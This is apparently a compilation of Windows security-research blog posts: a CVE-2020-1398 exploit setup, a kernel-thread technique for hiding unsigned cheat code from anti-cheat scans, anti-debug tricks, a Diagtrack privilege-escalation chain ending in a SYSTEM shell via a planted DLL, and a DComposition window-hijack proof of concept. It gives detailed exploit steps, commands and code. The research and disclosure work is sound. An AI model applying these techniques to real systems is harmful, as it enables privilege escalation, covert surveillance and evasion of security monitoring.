File System: NTFS.
Quick Formatting 30.0 GB
Volume label (32 characters, ENTER for none)?
Creating file system structures.
Format complete.
30.0 GB total disk space.
30.0 GB are available.

Now, we need to elevate to admin to delete System Volume Information.

C:\Users\jonas>d:
D:\>takeown /F "System Volume Information"

This results in

SUCCESS: The file (or folder): "D:\System Volume Information" now owned by user "DESKTOP-LTJEFST\jonas".

We can then

D:\>icacls "System Volume Information" /grant Everyone:(F)
Processed file: System Volume Information
Successfully processed 1 files; Failed processing 0 files
D:\>rmdir /s /q "System Volume Information"

We will use James Forshaw’s tool (attached) to create the mount point.

D:\>createmountpoint "System Volume Information" "\RPC Control"

Then copy the attached exploit.exe to it.

D:\>copy c:\Users\jonas\source\repos\exploitKit\x64\Release\exploit.exe .
1 file(s) copied.

Patch

I disclosed this vulnerability and it was assigned CVE-2020-1398. Its patch can be found here

Hiding execution of unsigned code in system threads

By: drew
12 January 2021 at 00:00

Anti-cheat development is, by nature, reactive; anti-cheats exist to respond to and thwart a videogame’s population of cheaters. For instance, a videogame with an exceedingly low amount of cheaters would have little need for an anti-cheat, while a videogame rife with cheaters would have a clear need for an anti-cheat. In order to catch cheaters, anti-cheats will employ as many methods as possible. Unfortunately, anti-cheats are not omniscient; they can not know of every single method or detection vector to catch cheaters. Likewise, the game hacks themselves must continue to discover new or unique methods in order to evade anti-cheats.

The Reactive Development Cycle of Game Hacking

This brings forth a reactive and continuous development cycle, for both the cheats and anti-cheats: the opposite party (cheat or anti-cheat) will employ a unique method to circumvent the adjacent party (anti-cheat or cheat) which, in response, will then do the same.

One such method employed by an increasing number of anti-cheats is to execute core anti-cheat functions from within the operating system’s kernel. A clear advantage over the alternative (i.e. usermode execution) is in the fact that, on Windows NT systems, the anti-cheat can selectively filter which processes are able to interact with the memory of the game process in which they are protecting, thus nullifying a plethora of methods used by game hacks.

In response to this, many (but not all) hack developers made (or are making) the decision to do the same; they too would, or will, execute their hack, either wholly or in part, from within the operating system’s kernel, thus nullifying what the anti-cheats had done.

Unlike with anti-cheats, however, this decision carries with it numerous concessions: namely, the fact that, for various reasons, it is most convenient (or it is only practical) to execute the hack as an unsigned kernel driver running without the kernel’s knowledge; the “driver” is typically a region of executable memory in the kernel’s address space and is never loaded or allocated by the kernel. In other words, it is a “manually-mapped” driver, loaded by a tool used by a game hack.

This ultimately provides anti-cheats with many opportunities to detect so-called “kernel-mode” or “ring 0” game hacks (noting that those terms are typically said with a marketable significance; they are literally used to market such game hacks, as if to imply robustness or security); if the anti-cheat can prove that the system is executing, or had executed, unsigned code, it can then potentially flag a user as being a cheater.

Analyzing a Thread’s Kernel Stack

One such method - the focus of this article, in fact - of detecting unsigned code execution in the kernel is to iterate each thread that is running in the system (optionally deciding to only iterate threads associated with the system process, i.e. system threads) and to initiate some kind of stack trace.

Bluntly, this allows the anti-cheat to quite effectively determine if a cheat were executing unsigned code. For example, some anti-cheats (e.g. BattlEye) will queue to each system thread an APC which will then initiate a stack trace. If the stack trace returns an instruction pointer that is not within the confines of any loaded kernel driver, the anti-cheat can then know that it may have encountered a system thread that is executing unsigned code. Furthermore, because it is a stack trace and not a direct sampling of the return instruction pointer, it would work quite reliably, even if a game hack were, for example, executing a spin-loop or continuous wait; the stack trace would always lead back to the unsigned code.

It is quite clear to any cheat developer that they can respond to this behavior by simply running their thread(s) with kernel APCs disabled, preventing delivery of such APCs and avoiding the detection vector. As is will be seen, however, this method does not entirely prevent detection of unsigned code execution.

(Copying Out, Then) Analyzing a Thread’s Kernel Stack

Certain anti-cheats - EasyAntiCheat, in particular - had a much more apt method of generating a pseudo-stacktrace: instead of generating a stack trace with a blockable APC, why not copy the contents of the thread’s kernel stack asynchronously? Continuing the reactive cheat-anti-cheat development cycle, EasyAntiCheat had opted to manually search for instances of nonpaged code pointers that may have been left behind as a result of system thread execution.

While the downsides of this method are debatable, the upside is quite clear: as long as the thread is making procedure calls (e.g. x86 call instruction) from within its own code, either to kernel routines or to its own, and regardless of its IRQL or if the thread is even running, its execution will leave behind detectable traces on its stack in the form of pointers to its own code which can be extracted and analyzed.

Callouts: Continuing The Reactive Development Cycle

Proposed is the “callout” method of system thread execution, born from the recognition that:

  1. A thread’s kernel stack, as identified by the kernel stack pointer in a thread’s ETHREAD object, can be analyzed asynchronously by a potential anti-cheat to detect traces of unsigned code execution; and that
  2. To be useful in most cases, a system thread must be able to make calls to most external NT kernel or executive procedures with little compromise.

The Life-cycle of the Callout Thread

The life-cycle of a callout thread is quite simple and can be used to demonstrate its implementation:

  • Before thread creation:
    • Allocate a non-paged stack to be loaded by the thread; the callout thread’s “real stack”
    • Allocate shellcode (ideally in executable memory not associated with the main driver module) which disables interrupts, preserves the old/kernel stack pointer (as it was on function entry), loads the real stack, and jumps to an initialization routine (the callout thread’s “bootstrap routine”)
    • Create a system thread (i.e. PsCreateSystemThread) whose start address points to the initialization shellcode
  • At thread entry (i.e. the bootstrap routine):
    • Preserve the stack pointer that had been given to the thread at thread entry (this must be given by the shellcode)
    • (Optionally) Iterate the thread’s old/kernel stack pointer, ceasing iteration at the stack base, eliminating any references/pointers to the initialization shellcode
    • (Optionally) Eliminate references to the initialization shellcode within the thread’s ETHREAD; for example, it may be worth changing the thread’s start address
    • (Optionally, but recommended) Free the memory containing the initialization shellcode, if it was allocated separately from the driver module
    • Proceed to thread execution

In clearer terms, the callout thread spends most of its time executing the driver’s unsigned code with interrupts disabled and with its own kernel stack - the real stack. It can also attempt to wipe any other traces of its execution which may have been present upon its creation.

The Usefulness of the Callout Thread

The callout thread must also be capable of executing most, if not all, NT kernel and executive procedures. As proposed, this is effectively impossible; the thread must run with interrupts disabled and with its own stack, thus creating an obvious problem as most procedures of interest would run at an IRQL <= DISPATCH_LEVEL. Furthermore, the NT IRQL model may be liable to ignore our setting of the interrupt flag, causing most routines to unpredictibly enter a deadlock or enable interrupts without our consent.

A mechanism to allow for a callout thread to invoke these routines of interest, the callout mechanism, is therefore used to:

  1. Provide a routine which can be used to conveniently invoke (“call out”) an external function; and in this routine,
  2. Load the thread’s original/kernel stack pointer;
  3. Copy function arguments on to the kernel thread’s stack from the real stack;
  4. Enable interrupts;
  5. Invoke the requested routine (within the same instruction boundary as when interrupts are enabled);
  6. Cleanly return from the routine without generating obvious stack traces (e.g. function pointers);
  7. Load the real stack pointer and disable the interrupt flag, and do so before returning to unsigned code; and
  8. Continue execution, preserving the function’s return value

While somewhat complicated, the callout mechanism can be achieved easily and, to a reasonable degree, portably, using two widely-available ROP gadgets from within the NT kernel.

The Usefulness of IRET(Q)

The constraint of needing to load a new stack pointer, interrupt flag, and interrupt pointer within an instruction boundary was immediately satisfied by the IRET instruction.

For those unfamiliar, the IRET (lit. “interrupt return”) instruction is intended to be used by an operating system or executive (here, the NT kernel) to return from an interrupt routine. To support the recognition of an interrupt from any mode of execution, and to generically resume to any mode of execution, the processor will need to (effectively) preserve the instruction pointer, stack pointer, CPL or privilege level (through the CS and SS selectors; and while they have a more general use-case, this is effectively what is preserved on most operating systems with a flat memory model), and RFLAGS register (as interrupts may be liable to modify certain flags).

To report this information to the OS interrupt handler, the CPU will, in a specific order:

  1. Push the SS (stack segment selector) register;
  2. Push the RSP (stack pointer) register;
  3. Push the RFLAGS (arithmetic/system flags) register;
  4. Push the CS (code segment selector) register;
  5. Push the RIP (instruction pointer) register; and, for some exception-class interrupts,
  6. Push an error code which may describe certain interrupt conditions (e.g. a page fault will know if the fault was caused by a non-present page, or if it were caused by a protection violation)

Note that the error code is not important to the CPU and must be accounted for by the interrupt handler. Each operation is an 8-byte push, meaning that, when the interrupt handler is invoked, the stack pointer will point to the preserved RIP (or error code) values.

It is hopefully obvious as to how, approximately, the IRET instruction would be implemented:

  1. Pop a value from the stack to retrieve the new instruction pointer (RIP)
  2. Pop a value from the stack to retrieve the new code segment selector (CS)
  3. Pop a value from the stack to retrieve the new arithmetic/system flags register (RFLAGS)
  4. Pop a value from the stack to retrieve the new stack pointer (RSP)
  5. Pop a value from the stack to retrieve the new stack segment selector (SS)

Or, as modeled as a series of pseudo-assembly instructions,

GENERIC_INTERRUPT:

;note that all push and pop operations are 8 bytes (64 bits) wide!
push ss
push rsp
push rflags
push cs
push rip ;return instruction pointer
;optionally, push a zero-extended 4-byte error code. any interrupt which pushes an error code must have its handler add 8 bytes to their instruction pointer before executing its IRET.

IRET:

pop rip ;pop return instruction pointer into RIP. do not treat this as a series of regular assembly instructions; treat it instead as CPU microcode!
pop cs
pop rflags
pop rsp
pop ss

The callout mechanism uses the IRET instruction to accomplish its constraints, as the desired RFLAGS (which holds the interrupt flag), instruction pointer, and stack pointer can be loaded by the instruction at the same time (within an instruction boundary).

ROP; Chaining It All Together

To reiterate, the callout routine uses IRET to change the instruction pointer, stack pointer, and interrupt flag within the same instruction boundary in order to jump to external procedures with the interrupt flag enabled. This must be done within an instruction boundary to prevent unfortunately-timed external interrupts from being received just before the external procedure call.

It, however, must also be able to return from the external procedure call without leaving unsigned code pointers on the kernel stack; furthermore, it must also not rely on unlikely/unaligned ROP gadgets (e.g. a cli;ret sequence) which may not exist on future NT kernel builds. Thus also required is an IRET instruction to be executed upon the routine’s completion.

It must be recognized that the nature of the IRET instruction is such that the return instruction pointer is located on the stack. However, it is also recognized that a new stack pointer is loaded. We can therefore use IRET to load the callout thread’s real stack, with the stack pointer pointing to the actual return address.

This eliminates the problem of code pointers being present in the kernel stack; the return address back to our thread’s execution is located on another stack loaded by IRET and which isn’t obviously visible on a stack trace. To facilitate this, the stack frame loaded by the IRET gadget must be such that the return instruction pointer simply contains a RET instruction.

So, the ideal stack frame when calling an external procedure is as such:

  1. IRET return data, where the return address is a RET instruction within ntoskrnl.exe (or any region of signed code), and where the stack pointer to load is the thread’s real stack; which would have a return address pushed on to it; and
  2. The address of an IRET instruction within a region of signed code

Within most, if not all, versions of ntoskrnl.exe, this can be achieved with a simple RET instruction (0xC3 byte); along with the following gadget:

mov rsp, rbp
mov rbp, [rbp + some_offset] ;where some_offset could be liable to change
add rsp, some_other_offset
iretq

This also slightly modifies the mechanism of the ROP chain in that it must also load a pointer to the desired IRET frame in RBP when calling the function. Thankfully, the x64 calling convention specifies the RBP register as non-volatile, or unchanging across function calls, meaning that we can initialize it with our desired pointer when invoking the external procedure. It also means that the callout mechanism is permitted to allocate a non-paged region of memory to be given in RBP; preventing it from having to keep an IRET frame on the kernel stack. This notes, of course, the potential for an awful race condition where an interrupt is received in between the mov rsp, rbp and iretq instructions; the stack pointer value may point to memory that is insufficient to use for stack operations.

In having the external procedure return to the above IRET gadget, we can easily return to our unsigned code without ever leaking unsigned code pointers on the kernel stack.

Implementation

An example implementation of the callout mechanism can be found here.

New year, new anti-debug: Don’t Thread On Me

By: jm
4 January 2021 at 23:00

With 2020 over, I’ll be releasing a bunch of new anti-debug methods that you most likely have never seen. To start off, we’ll take a look at two new methods, both relating to thread suspension. They aren’t the most revolutionary or useful, but I’m keeping the best for last.

Bypassing process freeze

This one is a cute little thread creation flag that Microsoft added into 19H1. Ever wondered why there is a hole in thread creation flags? Well, the hole has been filled with a flag that I’ll call THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE (I have no idea what it’s actually called) whose value is, naturally, 0x40.

To demonstrate what it does, I’ll show how PsSuspendProcess works:

NTSTATUS PsSuspendProcess(_EPROCESS* Process)
{
  const auto currentThread = KeGetCurrentThread();
  KeEnterCriticalRegionThread(currentThread);

  NTSTATUS status = STATUS_SUCCESS;
  if ( ExAcquireRundownProtection(&Process->RundownProtect) )
  {
    auto targetThread = PsGetNextProcessThread(Process, nullptr);
    while ( targetThread )
    {
      // Our flag in action
      if ( !targetThread->Tcb.MiscFlags.BypassProcessFreeze )
        PsSuspendThread(targetThread, nullptr);

      targetThread = PsGetNextProcessThread(Process, targetThread);
    }
    ExReleaseRundownProtection(&Process->RundownProtect);
  }
  else
    status = STATUS_PROCESS_IS_TERMINATING;

  if ( Process->Flags3.EnableThreadSuspendResumeLogging )
    EtwTiLogSuspendResumeProcess(status, Process, Process, 0);

  KeLeaveCriticalRegionThread(currentThread);
  return status;
}

So as you can see, NtSuspendProcess that calls PsSuspendProcess will simply ignore the thread with this flag. Another bonus is that the thread also doesn’t get suspended by NtDebugActiveProcess! As far as I know, there is no way to query or disable the flag once a thread has been created with it, so you can’t do much against it.

As far as its usefulness goes, I’d say this is just a nice little extra against dumping and causes confusion when you click suspend in Processhacker, and the process continues to chug on as if nothing happened.

Example

For example, here is a somewhat funny code that will keep printing I am running. I am sure that seeing this while reversing would cause a lot of confusion about why the hell one would suspend his own process.

#define THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE 0x40

NTSTATUS printer(void*) {
    while(true) {
        std::puts("I am running\n");
        Sleep(1000);
    }
    return STATUS_SUCCESS;
}

HANDLE handle;
NtCreateThreadEx(&handle, MAXIMUM_ALLOWED, nullptr, NtCurrentProcess(),
                 &printer, nullptr, THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE,
                 0, 0, 0, nullptr);

NtSuspendProcess(NtCurrentProcess());

Suspend me more

Continuing the trend of NtSuspendProcess being badly behaved, we’ll again abuse how it works to detect whether our process was suspended.

The trick lies in the fact that suspend count is a signed 8-bit value. Just like for the previous one, here’s some code to give you an understanding of the inner workings:

ULONG KeSuspendThread(_ETHREAD *Thread)
{
  auto irql = KeRaiseIrql(DISPATCH_LEVEL);
  KiAcquireKobjectLockSafe(&Thread->Tcb.SuspendEvent);

  auto oldSuspendCount = Thread->Tcb.SuspendCount;
  if ( oldSuspendCount == MAXIMUM_SUSPEND_COUNT ) // 127
  {
    _InterlockedAnd(&Thread->Tcb.SuspendEvent.Header.Lock, 0xFFFFFF7F);
    KeLowerIrql(irql);
    ExRaiseStatus(STATUS_SUSPEND_COUNT_EXCEEDED);
  }

  auto prcb = KeGetCurrentPrcb();
  if ( KiSuspendThread(Thread, prcb) )
    ++Thread->Tcb.SuspendCount;

  _InterlockedAnd(&Thread->Tcb.SuspendEvent.Header.Lock, 0xFFFFFF7F);
  KiExitDispatcher(prcb, 0, 1, 0, irql);
  return oldSuspendCount;
}

If you take a look at the first code sample with PsSuspendProcess it has no error checking and doesn’t care if you can’t suspend a thread anymore. So what happens when you call NtResumeProcess? It decrements the suspend count! All we need to do is max it out, and when someone decides to suspend and resume us, they’ll actually leave the count in a state it wasn’t previously in.

Example

The simple code below is rather effective:

  • Visual Studio - prevents it from pausing the process once attached.
  • WinDbg - gets detected on attach.
  • x64dbg - pause button becomes sketchy with error messages like “Program is not running” until you manually switch to the main thread.
  • ScyllaHide - older versions used NtSuspendProcess and caused it to be detected, but it was fixed once I reported it.
for(size_t i = 0; i < 128; ++i)
  NtSuspendThread(thread, nullptr);

while(true) {
  if(NtSuspendThread(thread, nullptr) != STATUS_SUSPEND_COUNT_EXCEEDED)
    std::puts("I was suspended\n");
  Sleep(1000);
}

Conclusion

If anything, I hope that this demonstrated that it’s best not to rely on NtSuspendProcess to work as well as you’d expect for tools dealing with potentially malicious or protected code. Hope you liked this post and expect more content to come out in the upcoming weeks.

Windows Telemetry service elevation of privilege

By: Jonas L
1 July 2020 at 23:00

Today, we will be looking at the “Connected User Experiences and Telemetry service,” also known as “diagtrack.” This article is quite heavy on NTFS-related terminology, so you’ll need to have a good understanding of it.

A feature known as “Advanced Diagnostics” in the Feedback Hub caught my interest. It is triggerable by all users and causes file activity in C:\Windows\Temp, a directory that is writeable for all users.

Reverse engineering the functionality and duplicating the needed interactions was quite a challenge as it used WinRT IPC instead of COM and I did not know WinRT existed, so I had some catching up to do.

In C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2003.1312.0_x64__8wekyb3d8bbwe\Helper.dll, I found a function with surprising possibilities:

WINRT_IMPL_AUTO(void) StartCustomTrace(param::hstring const& customTraceProfile) const;

This function will execute a WindowsPerformanceRecorder profile defined in an XML file specified as an argument in the security context of the Diagtrack Service.

The file path is parsed relative to the System32 folder, so I dropped an XML file in the writeable-for-all directory System32\Spool\Drivers\Color and passed that file path relative to the system directory aforementioned and voila - a trace recording was started by Diagtrack!

If we look at a minimal WindowsPerformanceRecorder profile we’d see something like this:

<WindowsPerformanceRecorder Version="1">
 <Profiles>
  <SystemCollector Id="SystemCollector">
   <BufferSize Value="256" />
   <Buffers Value="4" PercentageOfTotalMemory="true" MaximumBufferSpace="128" />
  </SystemCollector>  
  <EventCollector Id="EventCollector_DiagTrack_1e6a" Name="DiagTrack_1e6a_0">
   <BufferSize Value="256" />
   <Buffers Value="0.9" PercentageOfTotalMemory="true" MaximumBufferSpace="4" />
  </EventCollector>
   <SystemProvider Id="SystemProvider" /> 
  <Profile Id="Performance_Desktop.Verbose.Memory" Name="Performance_Desktop"
     Description="exploit" LoggingMode="File" DetailLevel="Verbose">
   <Collectors>
    <SystemCollectorId Value="SystemCollector">
     <SystemProviderId Value="SystemProvider" />
    </SystemCollectorId> 
    <EventCollectorId Value="EventCollector_DiagTrack_1e6a">
     <EventProviders>
      <EventProviderId Value="EventProvider_d1d93ef7" />
     </EventProviders>
    </EventCollectorId>    
    </Collectors>
  </Profile>
 </Profiles>
</WindowsPerformanceRecorder>

Information Disclosure

Having full control of the file opens some possibilities. The name attribute of the EventCollector element is used to create the filename of the recorded trace. The file path becomes:

C:\Windows\Temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrackAlternativeLogger_DiagTrack_XXXXXX.etl (where XXXXXX is the value of the name attribute.)

Full control over the filename and path is easily gained by setting the name to: \..\..\file.txt: which becomes the below:

C:\Windows\Temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrackAlternativeLogger_DiagTrack\..\..\file.txt:.etl

This results in C:\Windows\Temp\file.txt being used.

The recorded traces are opened by SYSTEM with FILE_OVERWRITE_IF as disposition, so it is possible to overwrite any file writeable by SYSTEM. The creation of files and directories (by appending ::$INDEX_ALLOCATION) in locations writeable by SYSTEM is also possible.

The ability to select any ETW provider for traces executed by the service is also interesting from an information disclosure point of view.

One scenario where I could see myself using the data is when you don’t know a filename because a service creates a file in a folder where you do not have permission to list the files.

Such filenames can get leaked by Microsoft-Windows-Kernel-File provider as shown in this snippet from an etl file recorded by adding 22FB2CD6-0E7B-422B-A0C7-2FAD1FD0E716 to the WindowsPerformanceRecorder profile file.

<EventData>
 <Data Name="Irp">0xFFFF81828C6AC858</Data>
 <Data Name="FileObject">0xFFFF81828C85E760</Data>
 <Data Name="IssuingThreadId">  10096</Data>
 <Data Name="CreateOptions">0x1000020</Data>
 <Data Name="CreateAttributes">0x0</Data>
 <Data Name="ShareAccess">0x3</Data>
 <Data Name="FileName">\Device\HarddiskVolume2\Users\jonas\OneDrive\Dokumenter\FeedbackHub\DiagnosticLogs\Install and Update-Post-update app experience\2019-12-13T05.42.15-SingleEscalations_132206860759206518\file_14_ProgramData_USOShared_Logs__</Data>
</EventData>

Such leakage can yield exploitation possibility from seemingly unexploitable scenarios.

Other security bypassing providers:

  • Microsoft-Windows-USB-UCX {36DA592D-E43A-4E28-AF6F-4BC57C5A11E8}
  • Microsoft-Windows-USB-USBPORT {C88A4EF5-D048-4013-9408-E04B7DB2814A} (Raw USB data is captured, enabling keyboard logging)
  • Microsoft-Windows-WinINet {43D1A55C-76D6-4F7E-995C-64C711E5CAFE}
  • Microsoft-Windows-WinINet-Capture {A70FF94F-570B-4979-BA5C-E59C9FEAB61B} (Raw HTTP traffic from iexplore, Microsoft Store, etc. is captured - SSL streams get captured pre-encryption.)
  • Microsoft-PEF-WFP-MessageProvider (IPSEC VPN data pre encryption)

Code Execution

Enough about information disclosure, how do we turn this into code execution?

The ability to control the destination of .etl files will most likely not lead to code execution easily; finding another entry point is probably necessary. The limited control over the files content makes exploitation very hard; perhaps crafting an executable PowerShell script or bat file is plausible, but then there is the problem of getting those executed.

Instead, I chose to combine my active trace recording with a call to:

WINRT_IMPL_AUTO(Windows::Foundation::IAsyncAction) SnapCustomTraceAsync(param::hstring const& outputDirectory)

When supplying an outputDirectory value located inside %WINDIR%\temp\DiagTrack_alternativeTrace (Where the .etl files of my running trace are saved) an interesting behavior emerges.

The Diagtrack Service will rename all the created .etl files in DiagTrack_alternativeTrace to the directory given as the outputDirectory argument to SnapCustomTraceAsync. This allows destination control to be acquired because rename operations that occur where the source file gets created in a folder that grants non-privileged users write access are exploitable. This is due to the permission inheritance of files and their parent directories. When a file is moved by a rename operation, the DACL does not change. What this means is that if we can make the destination become %WINDIR%\System32, and somehow move the file then we will still have write permission to the file. So, we know we control the outputDirectory argument of SnapCustomTraceAsync, but some limitations exist.

If the chosen outputDirectory is not a child of %WINDIR%\temp\DiagTrack_alternativeTrace, the rename will not happen. The outputDirectory cannot exist because the Diagtrack Service has to create it. When created, it is created with SYSTEM as its owner; only the READ permission is granted to users.

This is problematic as we cannot make the directory into a mount point. Even if we had the required permissions, we would be stopped by not being able to empty the directory because Diagtrack has placed the snapshot output etl file inside it. Lucky for us, we can circumvent these obstacles by creating two levels of indirection between the outputDirectory destination and DiagTrack_alternativeTrace.

By creating the folder DiagTrack_alternativeTrace\extra\indirections and supplying %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap as the outputDirectory we allow Diagtrack to create the snap folder with its limited permissions, as we are inside DiagTrack_alternativeTrace. With this, we can rename the extra folder, as it is created by us. The two levels of indirection is necessary to bypass the locking of the directory due to Diagtrack having open files inside the directory. When extra is renamed, we can recreate %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap (which is now empty) and we have full permissions to it as we are the owner!

Now, we can turn DiagTrack_alternativeTrace\extra\indirections\snap into a mount point targeted at %WINDIR%\system32 and Diagtrack will move all files matching WPR_initiated_DiagTrack*.etl* into %WINDIR%\system32. The files will still be writeable as they were created in a folder that granted users permission to WRITE. Unfortunately, having full control over a file in System32 is not quite enough for code execution… that is, unless we have a way of executing user controllable filenames - like the DiagnosticHub plugin method popularized by James Forshaw. There’s a caveat though, DiagnosticHub now requires any DLL it loads to be signed by Microsoft, but we do have some ways to execute a DLL file in system32 under SYSTEM security context - if the filename is something specific. Another snag though is that the filename is not controllable. So, how can we take control?

If instead of making the mountpoint target System32, we target an Object Directory in the NT namespace and create a symbolic link with the same name as the rename destination file, we gain control over the filename. The target of the symbolic link will become the rename operations destination. For instance, setting it to\??\%WINDIR%\system32\phoneinfo.dll results in write permission to a file the Error Reporting service will load and execute when an error report is submitted out of process. For my mountpoint target I chose \RPC Control as it allows all users to create symbolic links inside.

Let’s try it!

When Diagtrack should have done the rename, nothing happened. This is because, before the rename operation is done, the destination folder is opened, but now is an object directory. This means it’s unable to be opened by the file/directory API calls. This can be circumvented by timing the creation of the mount point to be after the opening of the folder, but before the rename. Normally in such situations, I create a file in the destination folder with the same name as the rename destination file. Then I put an oplock on the file, and when the lock breaks I know the folder check is done and the rename operation is about to begin. Before I release the lock I move the file to another folder and set the mount point on the now empty folder. That trick would not work this time though as the rename operation was configured to not overwrite an already existing file. This also means the rename would abort because of the existing file - without triggering the oplock.

On the verge of giving up I realized something:

If I make the junction point switch target between a benign folder and the object directory every millisecond there is 50% chance of getting the benign directory when the folder check is done and 50% chance of getting the object directory when the rename happens. That gives 25% chance for a rename to validate the check but end up as phoneinfo.dll in System32. I try avoiding race conditions if possible, but in this situation there did not appear to be any other ways forward and I could compensate for the chance of failure by repeating the process. To adjust for the probability of failure I decided to trigger an arbitrary number of renames, and fortunately for us, there’s a detail about the flow that made it possible to trigger as many renames I wanted in the same recording. The renames are not linked to files the diagnostic service knows it has created, so the only requirement is that they are in %WINDIR%\temp\DiagTrack_alternativeTrace and match WPR_initiated_DiagTrack*.etl*

Since we have permission to create files in the target folder, we can now create WPR_initiated_DiagTrack0.etl, WPR_initiated_DiagTrack1.etl, etc. and they will all get renamed!

As the goal is one of the files ending up as phoneinfo.dll in System32, why not just create the files as hard links to the intended payload? This way there is no need to use the WRITE permission to overwrite the file after the move.

After some experimentation I came to the following solution:

  1. Create the folders %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections
  2. Start diagnostic trace

    • %WINDIR%\temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrackAlternativeLogger_WPR System Collector.etl is created
  3. Create %WINDIR%\temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrack[0-100].etl as hardlinks to the payload.
  4. Create symbolic links \RPC Control\WPR_initiated_DiagTrack[0-100.]etl targeting %WINDIR%\system32\phoneinfo.dll
  5. Make OPLOCK on WPR_initiated_DiagTrack100.etl; when broken, check if %WINDIR%\system32\phoneinfo.dll exists. If not, repeat creation of WPR_initiated_DiagTrack[].etl files and matching symbolic links.
  6. Make OPLOCK on on WPR_initiated_DiagTrack0.etl; when it is broken, we know that the rename flow has begun but the first rename operation has not happened yet.

Upon breakage:

  1. rename %WINDIR%\temp\DiagTrack_alternativeTrace\extra to %WINDIR%\temp\DiagTrack_alternativeTrace\{RANDOM-GUID}
  2. Create folders %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap
  3. Start thread that in a loop switches %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap between being a mountpoint targeting %WINDIR%\temp\DiagTrack_alternativeTrace\extra and \RPC Control in NT object namespace.
  4. Start snapshot trace with %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap as outputDirectory

Upon execution, 100 files will get renamed. If none of them becomes phoneinfo.dll in system32, it will repeat until success.

I then added a check for the existence of %WINDIR%\system32\phoneinfo.dll in the thread that switches the junction point. The increased delay between switching appeared to increase the chance of one of the renames creating phoneinfo.dll. Testing shows the loop ends by the end of the first 100 iterations.

Upon detection of %WINDIR%\system32\phoneinfo.dll, a blank error report is submitted to Windows Error Reporting service, configured to be submitted out of proc, causing wermgmr.exe to load the just created phoneinfo.dll in SYSTEM security context.

The payload is a DLL that upon DLL_PROCESS_ATTACH will check for SeImpersonatePrivilege and, if enabled, cmd.exe will get spawned on the current active desktop. Without the privileged check, additional command prompts would spawn since phoneinfo.dll is also attempted to be loaded by the process that initiates the error reporting.

In addition, a message is shown using WTSSendMessage so we get an indicator of success even if the command prompt cannot be spawned in the correct session/desktop.

The red color is because my command prompts auto execute echo test> C:\windows:stream && color 4E; that makes all UAC elevated command prompts’ background color RED as an indicator to me.

Though my example on the repository contains private libraries, it may still be beneficial to get a general overview of how it works.

Abusing DComposition to render on external windows

By: yousif
12 May 2020 at 23:00

In 2012, Microsoft introduced “DirectComposition”, a technology that helps improve performance for bitmap drawings & compositions tremendously, the way it works is that it utilizes the graphics hardware to compose & render objects, which means that it’ll run independently, aside from the main UI thread.

It can therefore be deduced that there must be a layer of interaction, or a method to apply the composition onto the desired window, or target, abusing this layer of interaction is the main target of today’s article.

The layer of interaction that DirectCompositions use, are objects called “targets” & “visuals”, every IDCompositionTarget will be created by a respective API function that depends on a window handle, and every target will depend on a IDCompositionVisual which contains the visual content represented on the screen.

If you think that you can easily just create a window, then compose on-top of another window from a non-owning process, then you’re wrong. This will cause an error, and the composition won’t be created.

Reversal

Opening up win32kfull, which is the kernel-mode component for DWM, GDI & other windows features then searching for “DComposition” will yield multiple results:

The one we’re interested in is NtUserCreateDCompositionHwndTarget, according to it’s prototype: __int64 (HWND a1, int a2, _QWORD *a3), we can induce that this is simply just IDCompositionDevice::CreateTargetForHwnd, and the parameters are: (HWND hwnd, BOOL topmost, IDCompositionTarget** target).

At the very start of this function there’s a test that checks whether you can create a target for this composition or not:

last_status = TestWindowForCompositionTarget(window_handle, top_most);

This is a simplified form of that function:

NTSTATUS TestWindowForCompositionTarget(HWND window_handle, BOOL top_most)
{	
	tagWND* window_instance = ValidateHwnd(window_handle);
	
	if (!window_instance 
		|| !window_instance->thread_info)
		return STATUS_INVALID_PARAMETER;
		
	// some checks here to verify that DCompositions are supported, and available
	
	PEPROCESS calling_process = IoGetCurrentProcess();
	PEPROCESS owning_process = PsGetThreadProcess(window_instance->thread_info->owning_thread); // tagWnd*->tagTHREADINFO*->KTHREAD*
	
	if (calling_process != owning_process)
		return STATUS_ACCESS_DENIED;
	
	CHwndTargetProp target_properties{};
	
	if (CWindowProp::GetProp<CHwndTargetProp>(window_instance, &target_properties))
	{
		bool unk_error = false;
		
		if (top_most)
			unk_error = !(target_properties.top_most_handle == nullptr);
		else
			unk_error = !(target_properties.active_bg_handle == nullptr);
		
		if (unk_error)
			return (NTSTATUS)0x803e0006; // unique error code, i don't know what it's supposed to resemble
	}
	
	return STATUS_SUCCESS;
}

The check causing failures is if (calling_process != owning_process), this compares the caller’s process to the window’s owner process, and if this check fails they return a STATUS_ACCESS_DENIED error.

They retrieve the window’s owner process by calling ValidateHwnd, which is a function used everywhere in win32k:

This function will return a pointer to a struct of type tagWND, then access a member of type tagTHREADINFO at +0x10 (window_instance->thread_info), then access the actual thread pointer at +0x0 (thread_info->owning_thread).

One way to circumvent these checks is to swap the owning thread of the process’ window to our window temporarily, compose our target on it then swap it back very quickly, which is what the PoC is based on.

Proof Of Concept

I’ve made a PoC, that’ll hijack a window by it’s class name, then render a rectangle at it’s center. you can access the code here.

Why anti-cheats block overclocking tools

By: Daax
28 April 2020 at 23:00

Overview

